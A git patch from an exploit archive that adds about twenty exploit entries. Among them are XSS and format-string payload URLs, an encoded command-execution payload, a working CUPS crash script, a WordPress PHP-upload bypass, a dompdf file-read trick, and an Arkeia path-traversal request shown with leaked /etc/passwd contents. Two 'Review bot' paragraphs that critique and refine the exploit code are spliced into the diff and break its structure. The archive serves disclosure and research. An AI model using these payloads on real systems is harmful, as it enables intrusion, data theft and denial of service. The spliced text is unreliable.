From 7edc5785042a8bc5056972a7bc80226ff58f6177 Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Sat, 26 Apr 2014 04:35:04 +0000 Subject: [PATCH] Updated 04_26_2014 --- files.csv | 28 +++- platforms/asp/webapps/33009.txt | 9 ++ platforms/hardware/remote/33010.txt | 16 ++ platforms/hardware/remote/33016.txt | 16 ++ platforms/linux/dos/33015.c | 22 +++ platforms/linux/dos/33020.py | 91 ++++++++++++ platforms/multiple/remote/33007.txt | 38 +++++ platforms/multiple/remote/33023.txt | 18 +++ platforms/php/webapps/33000.txt | 9 ++ platforms/php/webapps/33001.ssh | 10 ++ platforms/php/webapps/33002.txt | 13 ++ platforms/php/webapps/33003.txt | 55 +++++++ platforms/php/webapps/33004.txt | 47 ++++++ platforms/php/webapps/33005.txt | 171 +++++++++++++++++++++ platforms/php/webapps/33006.txt | 73 +++++++++ platforms/php/webapps/33008.txt | 13 ++ platforms/php/webapps/33011.txt | 13 ++ platforms/php/webapps/33013.txt | 9 ++ platforms/php/webapps/33014.txt | 11 ++ platforms/php/webapps/33021.txt | 9 ++ platforms/php/webapps/33022.txt | 17 +++ platforms/windows/local/33012.c | 17 +++ platforms/windows/remote/32997.pl | 223 ++++++++++++++++++---------- platforms/windows/remote/33025.txt | 11 ++ 24 files changed, 859 insertions(+), 80 deletions(-) create mode 100755 platforms/asp/webapps/33009.txt create mode 100755 platforms/hardware/remote/33010.txt create mode 100755 platforms/hardware/remote/33016.txt create mode 100755 platforms/linux/dos/33015.c create mode 100755 platforms/linux/dos/33020.py create mode 100755 platforms/multiple/remote/33007.txt create mode 100755 platforms/multiple/remote/33023.txt create mode 100755 platforms/php/webapps/33000.txt create mode 100755 platforms/php/webapps/33001.ssh create mode 100755 platforms/php/webapps/33002.txt create mode 100755 platforms/php/webapps/33003.txt create mode 100755 platforms/php/webapps/33004.txt create mode 100755 platforms/php/webapps/33005.txt create mode 100755 platforms/php/webapps/33006.txt create mode 100755 platforms/php/webapps/33008.txt create mode 100755 
platforms/php/webapps/33011.txt create mode 100755 platforms/php/webapps/33013.txt create mode 100755 platforms/php/webapps/33014.txt create mode 100755 platforms/php/webapps/33021.txt create mode 100755 platforms/php/webapps/33022.txt create mode 100755 platforms/windows/local/33012.c create mode 100755 platforms/windows/remote/33025.txt diff --git a/files.csv b/files.csv index 1b498de08..15c43c928 100755 --- a/files.csv +++ b/files.csv @@ -12565,7 +12565,7 @@ id,file,description,date,author,platform,type,port 14336,platforms/php/webapps/14336.txt,"Joomla EasyBlog Persistent XSS Vulnerability",2010-07-12,Sid3^effects,php,webapps,0 14337,platforms/php/webapps/14337.html,"TheHostingTool 1.2.2 - Multiple CSRF Vulnerabilities",2010-07-12,10n1z3d,php,webapps,0 14338,platforms/php/webapps/14338.html,"GetSimple CMS 2.01 - Multiple Vulnerabilities (XSS/CSRF)",2010-07-12,10n1z3d,php,webapps,0 -14339,platforms/linux/local/14339.sh,"Ubuntu PAM MOTD Local Root Exploit",2010-07-12,anonymous,linux,local,0 +14339,platforms/linux/local/14339.sh,"Ubuntu PAM 1.1.0 MOTD - Local Root Exploit",2010-07-12,anonymous,linux,local,0 14341,platforms/php/webapps/14341.html,"Campsite CMS 3.4.0 - Multiple CSRF Vulnerabilities",2010-07-12,10n1z3d,php,webapps,0 14342,platforms/php/webapps/14342.html,"Grafik CMS 1.1.2 - Multiple CSRF Vulnerabilities",2010-07-12,10n1z3d,php,webapps,0 14344,platforms/windows/dos/14344.c,"Corel WordPerfect Office X5 15.0.0.357 (wpd) Buffer Overflow PoC",2010-07-12,LiquidWorm,windows,dos,0 
@@ -12931,7 +12931,7 @@ id,file,description,date,author,platform,type,port 14809,platforms/php/webapps/14809.txt,"kontakt formular 1.1 - Remote File Inclusion Vulnerability",2010-08-26,bd0rk,php,webapps,0 14810,platforms/php/webapps/14810.txt,"gaestebuch 1.2 - Remote File Inclusion Vulnerability",2010-08-26,bd0rk,php,webapps,0 14811,platforms/php/webapps/14811.txt,"Joomla Component (com_remository) Remote Upload File",2010-08-26,J3yk0ob,php,webapps,0 -14814,platforms/linux/local/14814.c,"Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit",2010-08-27,"Jon Oberheide",linux,local,0 +14814,platforms/linux/local/14814.c,"Linux Kernel < 2.6.36-rc1 CAN BCM - Privilege Escalation Exploit",2010-08-27,"Jon Oberheide",linux,local,0 14815,platforms/php/webapps/14815.txt,"pecio CMS 2.0.5 - Multiple Remote File Inclusion Vulnerabilities",2010-08-27,eidelweiss,php,webapps,0 14817,platforms/php/webapps/14817.txt,"Esvon Classifieds 4.0 - Multiple Vulnerabilities",2010-08-27,Sn!pEr.S!Te,php,webapps,0 14818,platforms/linux/remote/14818.pl,"McAfee LinuxShield <= 1.5.1 - Local/Remote Root Code Execution",2010-08-27,"Nikolas Sotiriu",linux,remote,0 
@@ -29742,4 +29742,26 @@ id,file,description,date,author,platform,type,port 32996,platforms/multiple/remote/32996.txt,"Nortel Contact Center Manager Administration Password Disclosure Vulnerability",2009-05-14,"Bernhard Muller",multiple,remote,0 32997,platforms/windows/remote/32997.pl,"Acunetix 8 build 20120704 - Remote Stack Based Overflow",2014-04-24,An7i,windows,remote,0 32998,platforms/multiple/remote/32998.c,"Heartbleed OpenSSL - Information Leak Exploit (2) - DTLS Support",2014-04-24,"Ayman Sagy",multiple,remote,0 -32999,platforms/php/webapps/32999.py,"Bonefire v.0.7.1 - Reinstall Admin Account Exploit",2014-04-24,"Mehmet Dursun Ince",php,webapps,0 +32999,platforms/php/webapps/32999.py,"Bonefire v.0.7.1 - Reinstall Admin Account Exploit",2014-04-24,"Mehmet Ince",php,webapps,0 +33000,platforms/php/webapps/33000.txt,"Cacti <= 0.8.7 'data_input.php' Cross Site Scripting Vulnerability",2009-05-15,fgeek,php,webapps,0 +33001,platforms/php/webapps/33001.ssh,"Kingsoft Webshield 1.1.0.62 Cross Site scripting and Remote Command Execution Vulnerability",2009-05-20,inking,php,webapps,0 +33002,platforms/php/webapps/33002.txt,"Profense 2.2.20/2.4.2 Web Application Firewall Security Bypass Vulnerabilities",2009-05-20,EnableSecurity,php,webapps,0 +33003,platforms/php/webapps/33003.txt,"Wordpress Work-The-Flow Plugin 1.2.1 - Arbitrary File Upload",2014-04-24,nopesled,php,webapps,80 +33004,platforms/php/webapps/33004.txt,"dompdf 0.6.0 (dompdf.php, read param) - Arbitrary File Read",2014-04-24,Portcullis,php,webapps,80 +33005,platforms/php/webapps/33005.txt,"WD Arkeia Virtual Appliance 10.2.9 - Local File Inclusion",2014-04-24,"SEC Consult",php,webapps,80 +33006,platforms/php/webapps/33006.txt,"AlienVault 4.3.1 - Unauthenticated SQL Injection",2014-04-24,"Sasha Zivojinovic",php,webapps,443 +33007,platforms/multiple/remote/33007.txt,"Novell GroupWise <= 8.0 WebAccess Multiple Security Vulnerabilities",2009-05-21,"Gregory Duchemin",multiple,remote,0 
+33008,platforms/php/webapps/33008.txt,"LxBlog Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2009-05-22,Securitylab.ir,php,webapps,0 +33009,platforms/asp/webapps/33009.txt,"DotNetNuke <= 4.9.3 'ErrorPage.aspx' Cross-Site Scripting Vulnerability",2009-05-22,"ben hawkes",asp,webapps,0 +33010,platforms/hardware/remote/33010.txt,"SonicWALL Global VPN Client 4.0 Log File Remote Format String Vulnerability",2009-05-26,lofi42,hardware,remote,0 +33011,platforms/php/webapps/33011.txt,"PHP-Nuke 8.0 'main/tracking/userLog.php' SQL Injection Vulnerability",2009-05-27,"Gerendi Sandor Attila",php,webapps,0 +33012,platforms/windows/local/33012.c,"Microsoft Windows XP/2000/2003 Desktop Wall Paper System Parameter Local Privilege Escalation Vulnerability",2009-02-02,Arkon,windows,local,0 +33013,platforms/php/webapps/33013.txt,"Lussumo Vanilla 1.1.5/1.1.7 'updatecheck.php' Cross Site Scripting Vulnerability",2009-05-15,"Gerendi Sandor Attila",php,webapps,0 +33014,platforms/php/webapps/33014.txt,"Achievo <= 1.3.4 Multiple Cross Site Scripting Vulnerabilities",2009-05-28,MaXe,php,webapps,0 +33015,platforms/linux/dos/33015.c,"Linux Kernel 2.6.x 'splice(2)' Double Lock Local Denial of Service Vulnerability",2009-05-29,"Miklos Szeredi",linux,dos,0 +33016,platforms/hardware/remote/33016.txt,"SonicWALL SSL-VPN 'cgi-bin/welcome/VirtualOffice' Remote Format String Vulnerability",2009-05-29,"Patrick Webster",hardware,remote,0 +33020,platforms/linux/dos/33020.py,"CUPS <= 1.3.9 'cups/ipp.c' NULL Pointer Dereference Denial Of Service Vulnerability",2009-06-02,"Anibal Sacco",linux,dos,0 +33021,platforms/php/webapps/33021.txt,"PHP-Nuke 8.0 Downloads Module 'query' Parameter Cross Site Scripting Vulnerability",2009-06-02,"Schap Security",php,webapps,0 +33022,platforms/php/webapps/33022.txt,"Joomla! 
Prior to 1.5.11 Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2009-06-03,"Airton Torres",php,webapps,0
+33023,platforms/multiple/remote/33023.txt,"Apache Tomcat <= 6.0.18 Form Authentication Existing/Non-Existing Username Enumeration Weakness",2009-06-03,"D. Matscheko",multiple,remote,0
+33025,platforms/windows/remote/33025.txt,"LogMeIn 4.0.784 'cfgadvanced.html' HTTP Header Injection Vulnerability",2009-06-05,Inferno,windows,remote,0
diff --git a/platforms/asp/webapps/33009.txt b/platforms/asp/webapps/33009.txt
new file mode 100755
index 000000000..c102577d7
--- /dev/null
+++ b/platforms/asp/webapps/33009.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/35074/info
+
+DotNetNuke is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+The issue affects versions prior to DotNetNuke 4.9.4.
+
+http://www.example.com/ErrorPage.aspx?status=500&error=test%3Ciframe%20src=%22http://www.example.net/XSS.html%22%3
\ No newline at end of file
diff --git a/platforms/hardware/remote/33010.txt b/platforms/hardware/remote/33010.txt
new file mode 100755
index 000000000..ae7027ad5
--- /dev/null
+++ b/platforms/hardware/remote/33010.txt
@@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/35093/info
+
+SonicWALL Global VPN Client is prone to a remote format-string vulnerability because it fails to properly sanitize user-supplied input before passing it as the format specifier to a formatted-printing function.
+
+Successfully exploiting this issue allows remote attackers to execute arbitrary machine code in the context of the application. Failed attempts may cause denial-of-service conditions.
+
+Global VPN Client 4.0.0.2-51e Standard and Enhanced are vulnerable; other versions may also be affected.
+
+The following proofs of concept are available:
+
+1. CFS: Add example.com to your "Forbidden Domains" and access http://www.example.com/%s%s%s%s%s%s/.
+
+2. GroupVPN: Establish a GroupVPN Tunnel and enter at the XAUTH Username %s%s%s%s%s.
+
+3. Webfrontend: Enter at the Login Page of your SonicWALL as Username %s%s%s%s%s
+
diff --git a/platforms/hardware/remote/33016.txt b/platforms/hardware/remote/33016.txt
new file mode 100755
index 000000000..3d932451f
--- /dev/null
+++ b/platforms/hardware/remote/33016.txt
@@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/35145/info
+
+Multiple SonicWALL SSL-VPN devices are prone to a remote format-string vulnerability because they fail to properly sanitize user-supplied input before passing it as the format specifier to a formatted-printing function.
+
+Attackers may exploit this issue to run arbitrary code in the context of the affected application. Failed attempts may cause denial-of-service conditions.
+
+The following are vulnerable:
+
+SSL-VPN 200 firmware prior to 3.0.0.9
+SSL-VPN 2000 firmware prior to 3.5.0.5
+SSL-VPN 4000 firmware prior to 3.5.0.5
+
+
+https://www.example.com/cgi-bin/welcome/VirtualOffice?err=ABCD%x%x%x
+https://www.example.com/cgi-bin/welcome/VirtualOffice?err=%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
+https://www.example.com/cgi-bin/welcome/VirtualOffice?err=%n
\ No newline at end of file
diff --git a/platforms/linux/dos/33015.c b/platforms/linux/dos/33015.c
new file mode 100755
index 000000000..5e02cd52d
--- /dev/null
+++ b/platforms/linux/dos/33015.c
@@ -0,0 +1,22 @@
+source: http://www.securityfocus.com/bid/35143/info
+
+The Linux kernel is prone to a local denial-of-service vulnerability.
+
+Attackers can exploit this issue to cause an affected process to hang, denying service to legitimate users. Other denial-of-service attacks are also possible.
+
+This issue was introduced in Linux Kernel 2.6.19. The following versions have been fixed:
+
+Linux Kernel 2.6.30-rc3
+Linux Kernel 2.6.27.24
+Linux Kernel 2.6.29.4
+
+ pipe(pfds);
+ snprintf(buf, sizeof(buf), "/tmp/%d", getpid());
+ fd = open(buf, O_RDWR | O_CREAT, S_IRWXU);
+
+ if (fork()) {
+ splice(pfds[0], NULL, fd, NULL, 1024, NULL);
+ } else{
+ sleep(1);
+ splice(pfds[0], NULL, fd, NULL, 1024, NULL);
+ }
diff --git a/platforms/linux/dos/33020.py b/platforms/linux/dos/33020.py
new file mode 100755
index 000000000..90881927b
--- /dev/null
+++ b/platforms/linux/dos/33020.py
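Review bot: The C fragment at the end of the hunk cannot be built as archived: `pfds`, `buf` and `fd` are never declared, there are no `#include` lines and no enclosing `main`, so a reader has to reconstruct the harness before the test can be reproduced. A one-line header comment stating that, e.g. `/* fragment only: caller must declare int pfds[2], fd; char buf[]; and include <unistd.h>, <fcntl.h>, <stdio.h>, <sys/stat.h> */`, would make the scope of the snippet explicit. Separately, `open(buf, O_RDWR | O_CREAT, S_IRWXU)` on the predictable `/tmp/<pid>` path is used without `O_EXCL`, so it will follow a pre-existing file or symlink of the same name; on a shared test host `O_EXCL` and an `unlink()` afterwards cost nothing. The return value of `open` is also never checked, so a failed open silently turns into `splice` on fd -1.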
@@ -0,0 +1,91 @@
+source: http://www.securityfocus.com/bid/35169/info
+
+CUPS is prone to a denial-of-service vulnerability because of a NULL-pointer dereference that occurs when processing two consecutive IPP_TAG_UNSUPPORTED tags in specially crafted IPP (Internet Printing Protocal) packets.
+
+An attacker can exploit this issue to crash the affected application, denying service to legitimate users.
+
+from struct import pack
+import sys
+import socket
+
+class IppRequest:
+ """
+ Little class to implement a basic Internet Printing Protocol
+ """
+ def __init__(self, host, port, printers, hpgl_data="a"):
+ self.printers = printers
+ self.host = host
+ self.port = port
+ self.hpgl_data = hpgl_data
+ self.get_ipp_request()
+
+ def attribute(self, tag, name, value):
+ data = pack('>B',tag)
+ data += pack('>H',len(name))
+ data += name
+ data += pack('>H',len(value))
+ data += value
+ return data
+
+ def get_http_request(self):
+ http_request = "POST /printers/%s HTTP/1.1\r\n" % self.printers
+ http_request += "Content-Type: application/ipp\r\n"
+ http_request += "User-Agent: Internet Print Provider\r\n"
+ http_request += "Host: %s\r\n" % self.host
+ http_request += "Content-Length: %d\r\n" % len(self.ipp_data)
+ http_request += "Connection: Keep-Alive\r\n"
+ http_request += "Cache-Control: no-cache\r\n"
+ return http_request
+
+ def get_ipp_request(self):
+ operation_attr = self.attribute(0x47, 'attributes-charset', 'utf-8')
+ operation_attr += self.attribute(0x48, 'attributes-natural-language', 'en-us')
+ operation_attr += self.attribute(0x45, 'printer-uri', "http://%s:%s/printers/%s" % (self.host, self.port, self.printers))
+ operation_attr += self.attribute(0x42, 'job-name', 'foo barrrrrrrr')
+ operation_attr += self.attribute(0x42, 'document-format', 'application/vnd.hp-HPGL')
+
+ self.ipp_data = "\x01\x00" # version-number: 1.0
+ self.ipp_data += "\x00\x02" # operation-id: Print-job
+ self.ipp_data += "\x00\x00\x00\x01" # request-id: 1
+ self.ipp_data += "\x01" # operation-attributes-tag
+ self.ipp_data += "\x0f\x0f"
+ # self.ipp_data += operation_attr
+ self.ipp_data += "\x02" # job-attributes-tag
+ self.ipp_data += "\x03" # end-of-attributes-tag
+ self.ipp_data += self.hpgl_data;
+ return self.ipp_data
+
+def main():
+
+ try:
+ printer = sys.argv[1]
+ host = sys.argv[2]
+ except:
+ print "[+] Usage: exploit printer_name host"
+ return 0
+
+ data = "A"*100
+
+ ipp = IppRequest(host,"80", printer, data)
+ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+
+ print "[+] Connecting to the host"
+ s.connect((host, 631))
+
+ #requests = ipp.get_http_request()
+ #for each in requests:
+ # s.send(each)
+
+ print "[+] Sending request"
+ s.send(ipp.get_http_request())
+ s.send("\r\n")
+
+ print "[+] Sending ipp data"
+ s.send(ipp.get_ipp_request())
+
+ print "Response:%s" % s.recv(1024)
+ print "done!"
+
+if __name__ == "__main__":
+ sys.exit(main())
+
diff --git a/platforms/multiple/remote/33007.txt b/platforms/multiple/remote/33007.txt
new file mode 100755
index 000000000..30a0226bd
--- /dev/null
+++ b/platforms/multiple/remote/33007.txt
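Review bot: `main()` returns 0 from the bare `except:` around the `sys.argv` lookups, so `sys.exit(main())` reports success on a usage error, and the bare clause also hides any unrelated exception raised there; `except IndexError:` together with `return 1` would be the honest form. The socket is created with no timeout and is never closed: `s.recv(1024)` blocks for ever if the daemon dies without closing the connection, so an `s.settimeout(...)` before `s.connect` and an `s.close()` (or a `try/finally`) after the `recv` would let the test terminate predictably. In `get_ipp_request` the whole `operation_attr` block is built and then discarded because the `self.ipp_data += operation_attr` line is commented out, and `IppRequest` is given port `"80"` while the connection goes to `631`; both look deliberate for the trigger, but a short comment saying so would save the next reader a puzzle.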
@@ -0,0 +1,38 @@
+source: http://www.securityfocus.com/bid/35066/info
+
+Novell GroupWise WebAccess is prone to multiple security vulnerabilities.
+
+An attacker may leverage these issues to bypass certain security restrictions or conduct cross-site scripting attacks.
+
+Note that some of the issues may be related to BID 35061. We will update this BID as more information emerges.
+
+Versions prior to WebAccess 7.03 HP3 and 8.0.0 HP2 are vulnerable.
+
+Following harmless code uses an onload() event handler to bootstrap its payload as soon as the email
+is open.
+The first stage of this script extracts the session token (User.Context) from within the current
+document's URI and used
+to make up the second stage.
+The second injects an iframe in the current page which in turn calls the signature configuration
+interface and changes the user's signature on the fly.
+This example uses a fake target, 'gwwa.victim.com' that must be changed with a real server
+addresss/name.
+Here, the security parser won't recognize "onload = 'javascript:..." as potentially unsafe just
+because of the space characters.
+
+
diff --git a/platforms/multiple/remote/33023.txt b/platforms/multiple/remote/33023.txt
new file mode 100755
index 000000000..206a288b2
--- /dev/null
+++ b/platforms/multiple/remote/33023.txt
@@ -0,0 +1,18 @@
+source: http://www.securityfocus.com/bid/35196/info
+
+Apache Tomcat is prone to a username-enumeration weakness because it displays different responses to login attempts, depending on whether or not the username exists.
+
+Attackers may exploit this weakness to discern valid usernames. This may aid them in brute-force password cracking or other attacks.
+
+The following are vulnerable:
+
+Tomcat 4.1.x (prior to 4.1.40)
+Tomcat 5.5x (prior to 5.5.28)
+Tomcat 6.0.x (prior to 6.0.20)
+
+The following example POST data is available:
+
+POST /j_security_check HTTP/1.1
+Host: www.example.com
+
+j_username=tomcat&j_password=%
\ No newline at end of file
diff --git a/platforms/php/webapps/33000.txt b/platforms/php/webapps/33000.txt new file mode 100755 index 000000000..af30311ea --- /dev/null +++ b/platforms/php/webapps/33000.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/34991/info + +Cacti is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +Versions prior to Cacti 0.8.7b are vulnerable. + +http://www.example.com/cacti/data_input.php?action="> \ No newline at end of file diff --git a/platforms/php/webapps/33001.ssh b/platforms/php/webapps/33001.ssh new file mode 100755 index 000000000..2dd6347ff --- /dev/null +++ b/platforms/php/webapps/33001.ssh @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/35038/info + +The Webshield feature of Kingsoft Internet Security 9 is prone to a remote cross-site scripting and command-execution vulnerability. + +Remote attackers may exploit this vulnerability to compromise an affected computer. + +This issue affects WebShield 1.1.0.62 and prior versions. + +http://www.example.com/index.php?html=%3c%70%20%73%74%79%6c%65%3d%22%62%61%63%6b%67%72%6f%75%6e%64%3a%75%72%6c%28%6a%61%76%61%73%63%72%69%70%74%3a%70%61%72%65%6e%74%2e%43%61%6c%6c%43%46%75%6e%63%28%27%65%78%65%63%27%2c%27%63%3a%5c%5c%77%69%6e%64%6f%77%73%5c%5c%73%79%73%74%65%6d%33%32%5c%5c%63%61%6c%63%2e%65%78%65%27%20%29%29%22%3e%74%65%73%74%3c%2f%70%3e + diff --git a/platforms/php/webapps/33002.txt b/platforms/php/webapps/33002.txt new file mode 100755 index 000000000..134c3bfc6 --- /dev/null +++ b/platforms/php/webapps/33002.txt 
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/35053/info
+
+Profense Web Application Firewall is prone to multiple security-bypass vulnerabilities.
+
+An attacker can exploit these issues to bypass certain security restrictions and perform various web-application attacks.
+
+Versions *prior to* the following are vulnerable:
+
+Profense 2.4.4
+Profense 2.2.22
+
+http://www.example.com/phptest/xss.php?var=%3CEvil%20script%20goes%20here%3E=%0AByPass
+http://www.example.com/phptest/xss.php?var=%3Cscript%3Ealert(document.cookie)%3C/script%20ByPass%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/33003.txt b/platforms/php/webapps/33003.txt
new file mode 100755
index 000000000..7f39ffe35
--- /dev/null
+++ b/platforms/php/webapps/33003.txt
@@ -0,0 +1,55 @@ +# Author: nopesled +# Date: 24/04/14 +# Software: https://wordpress.org/plugins/work-the-flow-file-upload/ +# Company: http://wtf-fu.com/ +# Version: 1.2.1 +# Tested on: Windows 7 +# Vulnerability: Unrestricted File Upload + + +Submit an image file via the wtf upload panel and intercept the POST request to /wp-admin/admin-ajax.php + +By editing the data from the control 'accept_file_types', we can upload normally disallowed filetypes such as PHP. + +Append '|php': + +- ----------------------------123456789123456\r\n +Content-Disposition: form-data; name="accept_file_types"\r\n +\r\n +jpg|jpeg|mpg|mp3|png|gif|wav|ogg|php\r\n + + +Now change the extension in the data for 'filename' to '.php' and enter your desired code like so + +- ----------------------------123456789123456\r\n +Content-Disposition: form-data; name="files[]"; filename="illegal.php"\r\n +Content-Type: application/octet-stream\r\n +\r\n +\n +- ----------------------------123456789123456--\r\n + +Submit this POST request and you will find your file in the directory: +/wp-content/uploads/public/wtf-fu_files/default/ + +It's not required to set the control 'deny_public_uploads' to true, because it still gets uploaded anyway regardless if it's enabled or not. + +################################### +-----BEGIN PGP SIGNED MESSAGE----- +Hash: SHA512 + +Signed. +-----BEGIN PGP SIGNATURE----- +Version: Keybase OpenPGP v0.1.11 +Comment: https://keybase.io/crypto + +wsBcBAABCgAGBQJTWQpLAAoJEOB0UMODnV4U7QIIAIKXDQVK8fIXY0BSO4ZrHq8L +2a51JCVmpwBzrHVp87FCpYHcMXyuCXWi5joEbiJFVi5ojHTSii5ZwvBVJwvyoKcy +jexj2IvMoC30zrgSdTu9/lMd1tYGYQCSlMubFvzE0edmDCo7fH2gF8Zvfw4Lj4ng +KJOpB9HsvDUJVNlbDMl+MbGAW32m6BqG4ttdjE1bs1suDxb/JrS7okuHu1Qmpe0+ +Xp50x4wUVrZSeqT5VnWDWjox2BnSGEcAKbkjFeRDBpgJyeWJGH20jXb6m4sYNLDT +gf9ml9oM5yncivMN2dJU+hp3Xyfp6rEute9jA+lcEMwZsyjlwAVFhszV4qh7X+o= +=5nDI +-----END PGP SIGNATURE----- +################################### \ No newline at end of file 
diff --git a/platforms/php/webapps/33004.txt b/platforms/php/webapps/33004.txt new file mode 100755 index 000000000..7c5109205 --- /dev/null +++ b/platforms/php/webapps/33004.txt 
@@ -0,0 +1,47 @@ +Vulnerability title: Arbitrary file read in dompdf +CVE: CVE-2014-2383 +Vendor: dompdf +Product: dompdf +Affected version: v0.6.0 +Fixed version: v0.6.1 (partial fix) +Reported by: Alejo Murillo Moyas + +Details: +An arbitrary file read vulnerability is present on dompdf.php file that +allows remote or local attackers to read local files using a special +crafted argument. This vulnerability requires the configuration flag +DOMPDF_ENABLE_PHP to be enabled (which is disabled by default). + +Using PHP protocol and wrappers it is possible to bypass the dompdf's +"chroot" protection (DOMPDF_CHROOT) which prevents dompdf from accessing +system files or other files on the webserver. Please note that the flag +DOMPDF_ENABLE_REMOTE needs to be enabled. + +Command line interface: +php dompdf.php +php://filter/read=convert.base64-encode/resource= + +Web interface: + +http://example/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource= + + +Further details at: +https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2383/ + + +Copyright: +Copyright (c) Portcullis Computer Security Limited 2014, All rights +reserved worldwide. Permission is hereby granted for the electronic +redistribution of this information. It is not to be edited or altered in +any way without the express written consent of Portcullis Computer +Security Limited. + +Disclaimer: +The information herein contained may change without notice. Use of this +information constitutes acceptance for use in an AS IS condition. There +are NO warranties, implied or otherwise, with regard to this information +or its use. Any use of this information is at the user's risk. In no +event shall the author/distributor (Portcullis Computer Security +Limited) be held liable for any damages whatsoever arising out of or in +connection with the use or spread of this information. \ No newline at end of file 
diff --git a/platforms/php/webapps/33005.txt b/platforms/php/webapps/33005.txt new file mode 100755 index 000000000..738c27df8 --- /dev/null +++ b/platforms/php/webapps/33005.txt 
@@ -0,0 +1,171 @@ +SEC Consult Vulnerability Lab Security Advisory < 20140423-0 > +======================================================================= + title: Path Traversal/Remote Code Execution + product: WD Arkeia Virtual Appliance (AVA) + vulnerable version: All Arkeia Network Backup releases (ASA/APA/AVA) since 7.0.3. + fixed version: 10.2.9 + CVE number: CVE-2014-2846 + impact: critical + homepage: http://www.arkeia.com/ + found: 2014-03-05 + by: M. Lucinskij + SEC Consult Vulnerability Lab + https://www.sec-consult.com +======================================================================= + +Vendor description: +------------------- +"The WD Arkeia virtual appliance (AVA) for backup provides simple, reliable and +affordable data protection for enterprises seeking to optimize the benefits of +virtualization. The AVA offers all the features of the hardware appliance, but +permits you to use your own choice of hardware." + +source: +http://www.arkeia.com/en/products/arkeia-network-backup/backup-server/virtual-appliance + + +Business recommendation: +------------------------ +The identified path traversal vulnerability can be exploited by unauthenticated +remote attackers to gain unauthorized access to the WD Arkeia virtual appliance +and stored backup data. + +SEC Consult recommends to restrict access to the web interface of the WD Arkeia +virtual appliance using a firewall until a comprehensive security +audit based on a security source code review has been performed and all +identified security deficiencies have been resolved by the affected vendor. + + +Vulnerability overview/description: +----------------------------------- +The WD Arkeia virtual appliance is affected by a path traversal vulnerability. +Path traversal enables attackers access to files and directories outside the +web root through relative file paths in the user input. 
+ +An unauthenticated remote attacker can exploit the identified vulnerability in +order to retrieve arbitrary files from the affected system and execute system +commands. + + +Proof of concept: +----------------- +The path traversal vulnerability exists in the +/opt/arkeia/wui/htdocs/index.php script. The value of the "lang" cookie +is not properly checked before including a file using the PHP include() +function. Example of the request that demonstrates the vulnerability by +retrieving the contents of the /etc/passwd file: + +POST /login/doLogin HTTP/1.0 +Host: $host +Cookie: lang=aaa..././..././..././..././..././..././etc/passwd%00 +Content-Length: 25 +Content-Type: application/x-www-form-urlencoded + +password=bbb&username=aaa + +The response from the affected application: + +HTTP/1.1 200 OK +Date: Wed, 05 Mar 2014 08:29:35 GMT +Server: Apache/2.2.15 (CentOS) +X-Powered-By: PHP/5.3.3 +Set-Cookie: PHPSESSID=2ga2peps9eak48ubnkvhf69n40; path=/ +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Set-Cookie: subaction=deleted; expires=Tue, 05-Mar-2013 08:29:34 GMT; path=/ +Cache-Control: no-cache +Pragma: no-cache +Charset: UTF-8 +Content-Length: 1217 +Connection: close +Content-Type: text/html; charset=UTF-8 + +root:x:0:0:root:/root:/bin/bash +bin:x:1:1:bin:/bin:/sbin/nologin +daemon:x:2:2:daemon:/sbin:/sbin/nologin +adm:x:3:4:adm:/var/adm:/sbin/nologin +lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin +sync:x:5:0:sync:/sbin:/bin/sync +shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown +halt:x:7:0:halt:/sbin:/sbin/halt +mail:x:8:12:mail:/var/spool/mail:/sbin/nologin +uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin +operator:x:11:0:operator:/root:/sbin/nologin +games:x:12:100:games:/usr/games:/sbin/nologin +gopher:x:13:30:gopher:/var/gopher:/sbin/nologin +ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin +nobody:x:99:99:Nobody:/:/sbin/nologin +vcsa:x:69:69:virtual console memory 
owner:/dev:/sbin/nologin +ntp:x:38:38::/etc/ntp:/sbin/nologin +saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin +postfix:x:89:89::/var/spool/postfix:/sbin/nologin +apache:x:48:48:Apache:/var/www:/sbin/nologin +sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin +ldap:x:55:55:LDAP User:/var/lib/ldap:/sbin/nologin +dhcpd:x:177:177:DHCP server:/:/sbin/nologin +tcpdump:x:72:72::/:/sbin/nologin +{"local":{"STATUS":["0"],"MESSAGE":["Error code 4, Bad password or +login"],"PARAM2":[""],"PARAM3":[null],"LAST":[1],"sessnum":[null],"transnum":[n +ull]}} + +Furthermore, the identified vulnerability can be also exploited to +execute arbitrary PHP code/system commands by including files that +contain specially crafted user input. + + +Vulnerable / tested versions: +----------------------------- +The vulnerability has been verified to exist in the 10.2.7 version of the WD +Arkeia virtual appliance. + +According to the vendor all Arkeia Network Backup releases (ASA/APA/AVA) since +7.0.3 are affected. + + +Vendor contact timeline: +------------------------ +2014-03-13: Contacting vendor through support@arkeia.com +2014-03-14: Vendor confirms the vulnerability. +2014-03-17: 